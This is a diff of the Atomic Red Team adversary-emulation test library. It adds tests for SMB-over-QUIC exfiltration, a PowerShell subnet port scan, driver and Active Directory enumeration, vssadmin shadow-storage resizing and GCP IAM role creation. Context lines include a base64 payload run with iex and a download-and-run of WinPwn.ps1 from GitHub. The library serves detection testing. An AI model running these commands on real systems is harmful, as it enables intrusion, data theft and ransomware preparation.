+        Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
+        Prerequisites:
+          - A file server running Windows Server 2022 Datacenter: Azure Edition
+          - A Windows 11 computer
+          - Windows Admin Center
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_path:
+          description: The UNC path to the share on the file server
+          type: string
+          default: "\\\\example.com\\sales"
+        local_file:
+          description: The local file to be transferred
+          type: path
+          default: C:\path\to\file.txt
+      executor:
+        command: |
+          New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
+          copy '#{local_file}' 'Z:\'
+        name: powershell
+        elevation_required: true
+    - name: Exfiltration Over SMB over QUIC (NET USE)
+      auto_generated_guid: 183235ca-8e6c-422c-88c2-3aa28c4825d9
+      description: |
+        Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
+        Prerequisites:
+          - A file server running Windows Server 2022 Datacenter: Azure Edition
+          - A Windows 11 computer
+          - Windows Admin Center
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_path:
+          description: The UNC path to the share on the file server
+          type: string
+          default: "\\\\example.com\\sales"
+        local_file:
+          description: The local file to be transferred
+          type: path
+          default: C:\path\to\file.txt
+      executor:
+        command: |
+          NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
+          copy '#{local_file}' '*:\'
+        name: powershell
+        elevation_required: true
  T1184:
    technique:
      x_mitre_platforms:
@@ -72607,10 +72951,10 @@ lateral-movement:
          default: '4489'
      executor:
        command: |
-          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f
+          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
          netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
        cleanup_command: |
-          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
+          reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
          netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
          net stop TermService >nul 2>&1
          net start TermService >nul 2>&1
@@ -84502,6 +84846,20 @@ discovery:
          wmic OS get Caption,OSArchitecture,Version
          wmic DISKDRIVE get Caption
        name: command_prompt
+    - name: Driver Enumeration using DriverQuery
+      auto_generated_guid: bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9
+      description: "Executes the driverquery command to list drivers installed on
+        the system. Adversaries utilize the feature to enumerate the driver and it
+        can be\nused for Exploitation. \ncommand /v - provide verbose output but not
+        valid for signed drivers\n        /si - provide information about signed drivers
+        \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          driverquery /v
+          driverquery /si
+        name: command_prompt
  T1010:
    technique:
      modified: '2023-04-15T16:46:04.776Z'
@@ -87550,6 +87908,57 @@ discovery:
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          fruit -noninteractive -consoleoutput
        name: powershell
+    - name: Port-Scanning /24 Subnet with PowerShell
+      auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
+      description: |
+        Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+        The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ip_address:
+          description: IP-Address within the target subnet. Default is empty and script
+            tries to determine local IP address of attacking machine.
+          type: string
+          default: ''
+        port_list:
+          description: Comma separated list of ports to scan
+          type: string
+          default: 445, 3389
+        timeout_ms:
+          description: Connection timeout in milliseconds
+          type: string
+          default: '200'
+      executor:
+        command: |
+          $ipAddr = "#{ip_address}"
+          if ($ipAddr -eq "") {
+              # Assumes the "primary" interface is shown at the top
+              $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+              Write-Host "[i] Using Interface $interface"
+              $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+          }
+          Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+          $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+          # Always assumes /24 subnet
+          Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+          $ports = #{port_list}
+          $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+          foreach ($ip in $subnetIPs) {
+              foreach ($port in $ports) {
+                try {
+                    $tcp = New-Object Net.Sockets.TcpClient
+                    $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                } catch {}
+                if ($tcp.Connected) {
+                    $tcp.Close()
+                    Write-Host "Port $port is open on $ip"
+                }
+              }
+          }
+        name: powershell
  T1518:
    technique:
      modified: '2023-03-30T21:01:50.920Z'
@@ -95226,6 +95635,18 @@ impact:
          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
        name: command_prompt
        elevation_required: true
+    - name: Windows - vssadmin Resize Shadowstorage Volume
+      auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
+      description: Adversaries generally try to Resize Shadowstorage Volume using
+        vssadmin.exe to avoid the shadow volumes being made again. This technique
+        is typically found used by adversaries during a ransomware event and a precursor
+        to deleting the shadowstorage.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
+        name: powershell
+        elevation_required: true
  T1561.001:
    technique:
      modified: '2023-04-12T23:42:59.868Z'
@@ -139,13 +139,13 @@ Changing RDP Port to Non Standard Port via Command_Prompt


 ```cmd
-reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
 netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
+reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
 netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
 net stop TermService >nul 2>&1
 net start TermService >nul 2>&1
@@ -85,10 +85,10 @@ atomic_tests:
      default: "4489"
  executor:
    command: |
-      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f
+      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
      netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
    cleanup_command: |
-      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
+      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
      netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
      net stop TermService >nul 2>&1
      net start TermService >nul 2>&1
@@ -26,6 +26,8 @@ Within macOS environments, adversaries may use the native Bonjour application to

 - [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)

+- [Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell](#atomic-test-10---port-scanning-24-subnet-with-powershell)
+

 <br/>

@@ -400,4 +402,66 @@ sudo systemctl start docker



+<br/>
+<br/>
+
+## Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell
+Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 05df2a79-dba6-4088-a804-9ca0802ca8e4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. | string | |
+| port_list | Comma separated list of ports to scan | string | 445, 3389|
+| timeout_ms | Connection timeout in milliseconds | string | 200|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$ipAddr = "#{ip_address}"
+if ($ipAddr -eq "") {
+    # Assumes the "primary" interface is shown at the top
+    $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+    Write-Host "[i] Using Interface $interface"
+    $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+}
+Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+# Always assumes /24 subnet
+Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+$ports = #{port_list}
+$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+foreach ($ip in $subnetIPs) {
+    foreach ($port in $ports) {
+      try {
+          $tcp = New-Object Net.Sockets.TcpClient
+          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+      } catch {}
+      if ($tcp.Connected) {
+          $tcp.Close()
+          Write-Host "Port $port is open on $ip"
+      }
+    }
+}
+```
+
+
+
+
+
+
 <br/>
@@ -194,3 +194,53 @@ atomic_tests:
      docker stop t1046_container
      docker rmi -f t1046
    name: sh
+- name: Port-Scanning /24 Subnet with PowerShell
+  auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
+  description: |
+    Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+    The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+  supported_platforms:
+  - windows
+  input_arguments:
+    ip_address:
+      description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine.
+      type: string
+      default: ""
+    port_list:
+      description: Comma separated list of ports to scan
+      type: string
+      default: "445, 3389"
+    timeout_ms:
+      description: Connection timeout in milliseconds
+      type: string
+      default: "200"
+  executor:
+    command: |
+      $ipAddr = "#{ip_address}"
+      if ($ipAddr -eq "") {
+          # Assumes the "primary" interface is shown at the top
+          $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+          Write-Host "[i] Using Interface $interface"
+          $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+      }
+      Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+      $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+      # Always assumes /24 subnet
+      Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+      $ports = #{port_list}
+      $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+      foreach ($ip in $subnetIPs) {
+          foreach ($port in $ports) {
+            try {
+                $tcp = New-Object Net.Sockets.TcpClient
+                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+            } catch {}
+            if ($tcp.Connected) {
+                $tcp.Close()
+                Write-Host "Port $port is open on $ip"
+            }
+          }
+      }
+    name: powershell
@@ -414,7 +414,7 @@ art-marker.txt is in the folder.

 ```powershell
 # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
-reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
+reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
 iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
 ```

@@ -167,7 +167,7 @@ atomic_tests:
  executor:
    command: |
      # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
-      reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
+      reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
      iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
    cleanup_command: |
      Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
@@ -34,6 +34,8 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr

 - [Atomic Test #14 - Active Directory Enumeration with LDIFDE](#atomic-test-14---active-directory-enumeration-with-ldifde)

+- [Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS](#atomic-test-15---active-directory-domain-search-using-ldap---linux-ubuntumacos)
+

 <br/>

@@ -545,4 +547,52 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {



+<br/>
+<br/>
+
+## Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
+Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** d58d749c-4450-4975-a9e9-8b1d562755c2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | The domain to be tested | string | example|
+| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | com|
+| user | username@domain of a user | string | user@example.com|
+| password | password of the user referenced inside user | string | s3CurePssw0rD!|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
+##### Check Prereq Commands:
+```sh
+which ldapsearch
+```
+##### Get Prereq Commands:
+```sh
+echo missing ldapsearch command; exit 1
+```
+
+
+
+
 <br/>
@@ -242,4 +242,40 @@ atomic_tests:
      ldifde.exe -f #{output_path}\#{output_file} -p subtree
    cleanup_command: |
      del #{output_path}\#{output_file}
-    name: command_prompt
+    name: command_prompt
+- name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
+  auto_generated_guid: d58d749c-4450-4975-a9e9-8b1d562755c2
+  description: |
+    Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
+  supported_platforms:
+  - linux
+  input_arguments:
+    domain:
+      description: The domain to be tested
+      type: string
+      default: example
+    top_level_domain:
+      description: The top level domain (.com, .test, .remote, etc... following domain, minus the .)
+      type: string
+      default: com
+    user:
+      description: username@domain of a user
+      type: string
+      default: user@example.com
+    password:
+      description: password of the user referenced inside user
+      type: string
+      default: s3CurePssw0rD!
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
+    prereq_command: |
+      which ldapsearch
+    get_prereq_command: |
+      echo missing ldapsearch command; exit 1
+  executor:
+    elevation_required: false
+    command: |
+      ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn 
+    name: sh
@@ -12,6 +12,8 @@ Once a cloud account is compromised, an adversary may perform [Account Manipulat

 - [Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified](#atomic-test-2---azure-persistence-automation-runbook-created-or-modified)

+- [Atomic Test #3 - GCP - Create Custom IAM Role](#atomic-test-3---gcp---create-custom-iam-role)
+

 <br/>

@@ -40,7 +42,6 @@ GCP Service Accounts can be used to gain intial access as well as maintain persi


 ```sh
-gcloud auth login --no-launch-browser
 gcloud config set project #{project-id}
 gcloud iam service-accounts create #{service-account-name}
 gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -63,6 +64,15 @@ if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
 ```sh
 echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
 ```
+##### Description: Check if user is logged in
+##### Check Prereq Commands:
+```sh
+gcloud config get-value account
+```
+##### Get Prereq Commands:
+```sh
+gcloud auth login --no-launch-browser
+```



@@ -155,4 +165,74 @@ terraform apply -auto-approve



+<br/>
+<br/>
+
+## Atomic Test #3 - GCP - Create Custom IAM Role
+This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team.
+
+Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP). 
+Custom roles are user-defined, and allow for the bundling of one or more supported permissions to meet specific needs. 
+Custom roles will not be updated automatically and could lead to privilege creep if not carefully scrutinized.
+
+This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*
+
+Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
+
+**Supported Platforms:** Iaas:gcp
+
+
+**auto_generated_guid:** 3a159042-69e6-4398-9a69-3308a4841c85
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| project-id | ID of the GCP Project you to execute the command against. | string | atomic-test-1|
+| role-name | The name of the role to be created. | string | AtomicRedTeamRole|
+| role-description | The description of the role to be created. | string | Atomic Red Team Custom IAM Role|
+| roles | List of roles to be applied | string | iam.serviceAccounts.get|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+gcloud config set project #{project-id}
+gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+```
+
+#### Cleanup Commands:
+```sh
+gcloud iam roles delete #{role-name} --project=#{project-id}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Requires gcloud
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+```
+##### Description: Check if user is logged in
+##### Check Prereq Commands:
+```sh
+gcloud config get-value account
+```
+##### Get Prereq Commands:
+```sh
+gcloud auth login --no-launch-browser
+```
+
+
+
+
 <br/>
@@ -35,7 +35,6 @@ atomic_tests:
    name: sh
    elevation_required: false
    command: |
-      gcloud auth login --no-launch-browser
      gcloud config set project #{project-id}
      gcloud iam service-accounts create #{service-account-name}
      gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
@@ -49,6 +48,12 @@ atomic_tests:
      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+  - description: | 
+      Check if user is logged in 
+    prereq_command: |
+      gcloud config get-value account
+    get_prereq_command: |
+      gcloud auth login --no-launch-browser
 - name: Azure Persistence Automation Runbook Created or Modified
  auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
  description: |
@@ -117,3 +122,57 @@ atomic_tests:
      Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
      cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/
      terraform destroy -auto-approve
+- name: GCP - Create Custom IAM Role
+  auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
+  description: |
+    This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team.
+
+    Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP). 
+    Custom roles are user-defined, and allow for the bundling of one or more supported permissions to meet specific needs. 
+    Custom roles will not be updated automatically and could lead to privilege creep if not carefully scrutinized.
+    
+    This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*
+    
+    Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
+    
+  supported_platforms:
+  - iaas:gcp
+  input_arguments:
+    project-id:
+      description: ID of the GCP Project you to execute the command against.
+      type: string
+      default: atomic-test-1
+    role-name:
+      description: The name of the role to be created.
+      type: string
+      default: AtomicRedTeamRole
+    role-description:
+      description: The description of the role to be created.
+      type: string
+      default: Atomic Red Team Custom IAM Role
+    roles:
+      description: List of roles to be applied
+      type: string
+      default: iam.serviceAccounts.get
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      gcloud config set project #{project-id}
+      gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
+    cleanup_command: |
+      gcloud iam roles delete #{role-name} --project=#{project-id}
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Requires gcloud
+    prereq_command: |
+      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+  - description: | 
+      Check if user is logged in 
+    prereq_command: |
+      gcloud config get-value account
+    get_prereq_command: |
+      gcloud auth login --no-launch-browser
@@ -58,6 +58,8 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a

 - [Atomic Test #25 - System Information Discovery with WMIC](#atomic-test-25---system-information-discovery-with-wmic)

+- [Atomic Test #26 - Driver Enumeration using DriverQuery](#atomic-test-26---driver-enumeration-using-driverquery)
+

 <br/>

@@ -897,4 +899,36 @@ wmic DISKDRIVE get Caption



+<br/>
+<br/>
+
+## Atomic Test #26 - Driver Enumeration using DriverQuery
+Executes the driverquery command to list drivers installed on the system. Adversaries utilize the feature to enumerate the driver and it can be
+used for Exploitation. 
+command /v - provide verbose output but not valid for signed drivers
+        /si - provide information about signed drivers
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+driverquery /v
+driverquery /si
+```
+
+
+
+
+
+
 <br/>
@@ -371,3 +371,17 @@ atomic_tests:
      wmic OS get Caption,OSArchitecture,Version
      wmic DISKDRIVE get Caption
    name: command_prompt
+- name: Driver Enumeration using DriverQuery
+  auto_generated_guid: bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9
+  description: |
+    Executes the driverquery command to list drivers installed on the system. Adversaries utilize the feature to enumerate the driver and it can be
+    used for Exploitation. 
+    command /v - provide verbose output but not valid for signed drivers
+            /si - provide information about signed drivers 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      driverquery /v
+      driverquery /si
+    name: command_prompt
@@ -50,6 +50,8 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code

 - [Atomic Test #22 - Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd](#atomic-test-22---suspicious-laps-attributes-query-with-adfind-ms-mcs-admpwd)

+- [Atomic Test #23 - Active Directory Domain Search](#atomic-test-23---active-directory-domain-search)
+

 <br/>

@@ -850,4 +852,52 @@ PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -h #{domain} -s subtree -f "o



+<br/>
+<br/>
+
+## Atomic Test #23 - Active Directory Domain Search
+Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 096b6d2a-b63f-4100-8fa0-525da4cd25ca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | The domain to be tested | string | example|
+| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | test|
+| user | username@domain of a user within the ad database | string | user@example.test|
+| password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
+##### Check Prereq Commands:
+```sh
+which ldapsearch
+```
+##### Get Prereq Commands:
+```sh
+echo ldapsearch not found
+```
+
+
+
+
 <br/>
@@ -383,4 +383,41 @@ atomic_tests:
    command: 'PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
    cleanup_command: 
    name: powershell
-    elevation_required: false
+    elevation_required: false
+
+- name: Active Directory Domain Search
+  auto_generated_guid: 096b6d2a-b63f-4100-8fa0-525da4cd25ca
+  description: |
+    Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
+  supported_platforms:
+  - linux
+  input_arguments:
+    domain:
+      description: The domain to be tested
+      type: string
+      default: example
+    top_level_domain:
+      description: The top level domain (.com, .test, .remote, etc... following domain, minus the .)
+      type: string
+      default: test
+    user:
+      description: username@domain of a user within the ad database
+      type: string
+      default: user@example.test
+    password:
+      description: password of the user with admin privileges referenced in admin_user
+      type: string
+      default: s3CurePssw0rD!
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
+    prereq_command: |
+      which ldapsearch
+    get_prereq_command: |
+      echo ldapsearch not found
+  executor:
+    elevation_required: false
+    command: |
+      ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
+    name: sh
@@ -0,0 +1,80 @@
+# T1098.002 - Account Manipulation: Additional Email Delegate Permissions
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/002)
+<blockquote>Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 
+
+For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) 
+
+Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
+
